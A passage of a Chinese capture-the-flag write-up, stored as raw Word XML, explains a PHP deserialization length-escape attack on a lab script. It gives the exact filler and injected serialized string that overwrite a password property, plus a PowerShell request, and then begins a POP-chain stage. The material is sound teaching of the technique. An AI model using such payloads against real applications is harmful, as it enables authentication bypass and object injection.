        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;p&gt;"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假若我们能够促使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属性在被反序列化解析时发生“越界吞噬”，把原本属于后方语法结构的字符消化掉，我们便能顺理成章地将原有的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属性覆盖，并注入我们自定义的恶意结构：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therTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"y"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin123"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确立了这一逻辑，也就明确了本阶段的总体破解方针。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="header-n137"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为何要在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参数上做手脚</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仔细观察代码中的这处硬性校验：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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'amgoinvc'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这表明参数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内部绝不能缺少</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amgoinvc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一字符串。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于此，顺水推舟的思路便是：利用传递给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属性的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参数来触发字符替换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由于每匹配并替换一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amgoinvc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">就会缩短</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节，</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若我们在其中植入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次该字符串，整体长度便会锐减：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4 * 4 = 16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于这种推算，初步设定如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d = amgoinvcamgoinvcamgoinvcamgoinvc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如此一来，在经过替换处理后，该段内容便会产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节的长度落差。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header-n147"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">深入剖析：这</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节究竟吃掉了什么</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="header-n148"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期的逃逸效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们所期望达成的完美状态为：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变量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在序列化字符串头部标示的长度值维持原样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但其内部真实的字符数已缩水了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节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这将迫使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在解析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时，不得不向后“借用”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字符来凑数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只要这</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节的“借用”恰好将原本用于声明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属性的语法包裹字符吞噬殆尽，我们就可以利用紧跟其后的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参数值来顶替并构造出合规的新序列化结构。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常的做法是手搓一段用于截断的闭合代码，如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;s:1:"y";s:8:"admin123";}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需要思考的是：这段“恶意闭合代码”应当安插在何处？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结论是：将其作为参数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传入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回顾一下未篡改前的报文布局：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s:1:"x";s:32:"&lt;d内容&gt;";s:1:"y";s:&lt;len&gt;:"&lt;p内容&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦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的读取游标被迫向后延展</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节，它就会将紧挨着的一截</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;s:1:"y";s:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">强制纳为己有。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时，只要吞噬的边界卡得精准，残余下来的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部分便会顺理成章地被当作合法的键值对进行解析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="header-n165"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2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必须以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;s:1:"y"...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打头的缘由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们的终极目的是哄骗反序列化引擎，使其最终读取到的指令流变成这样：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"某个被截断后的x内容";s:1:"y";s:8:"admin123";}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拆解来看即是：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前半段充当被拉长后的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的闭合部分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后半截则顺势挂载我们精心捏造的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属性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最后使用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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将整个对象实例强行终结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于上述逻辑，我们很容易想到将参数赋为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p = ;s:1:"y";s:8:"admin123";}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，仅仅这样还不够严谨，因为解析器在遇到右大括号之前依然会核对长度，为了确保后续被废弃的脏数据不破坏语法平衡，我们通常还需塞入一定数量的垃圾字符来占位。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">改良后的最终形态类似于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p = ;s:1:"y";s:8:"admin123";} + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大量填充字符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eader-n182"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析阶段一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的生效原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终打通此关卡的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实体如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d = amgoinvcamgoinvcamgoinvcamgoinvc</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p = ;s:1:"y";s:8:"admin123";}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重点绝非机械地背诵这串字符，而在于吃透背后的运作机理：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="header-n186"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1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所扮演的角色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中塞入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">amgoinvc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其唯一使命就是在经过正则替换洗礼后，精准地为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腾出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节的“吞噬额度”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="header-n188"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2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所扮演的角色</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时的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早就失去了所谓“密码”的语义，它纯粹是用来填补空缺、并借助语法错位强行“嫁接”上去的一段“虚假反序列化指令”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="header-n190"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此类题型的固定范式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日后如果在代码审计时撞见这套连招，务必保持极度敏感：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">serialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(...)</w:t>
      </w:r>
      <w:r>
        <w:br/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(...)</w:t>
      </w:r>
      <w:r>
        <w:br/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(...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只要确认字符替换操作会引发长度上的增减，就必然暗藏着利用反序列化长度逃逸进行攻击的绝佳跳板。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eader-n195"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一的发包与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试时只需直接请求对应的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/rune_trial.php?d=&lt;payload1&gt;&amp;p=&lt;payload2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了免去手工进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码的繁琐，我选择利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合之前的脚本进行请求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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'amgoinvcamgoinvcamgoinvcamgoinvc'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$p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';s:1:"y";s:8:"admin123";}'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'/rune_trial.php?d='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EscapeDataString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'&amp;p='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EscapeDataString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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦请求被顺利处理，页面将会回显如下信息：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提示阶段一已顺利告破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暴露出一个为后续关卡做铺垫的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目标文件名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为了防止剧透破坏做题体验，本文将该敏感文件名统一定义为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;relic&gt;.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至此，第一阶段的解题任务宣告圆满结束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="30" w:name="header-n210"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二破局思路：受限于白名单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链构造</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尽管第二关给出的代码体量庞大，但在审计时切忌陷入逐行死磕的误区，首要原则是梳理出宏观的骨架。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="header-n212"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">锁定数据交互点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'Chronicler'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'RuneScribe'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'RitualEngine'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'GateSentinel'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'Keystone'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'allowed_classes'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$allowed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通过这段逻辑可以提炼出如下关键点：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用户的输入受控点位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$_POST['data']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服务器端会对该参数执行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严格限制了反序列化过程中只认可数组</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中定义的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确了上述限制后，我们的战略目标随之转换：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">放弃寻找系统内置类的各种原生利用链（如原生类利用等），将全部精力集中在这给定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个类中，挖掘并拼接出一条可行的魔术方法执行链。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eader-n226"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二代码审计的正确姿势</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
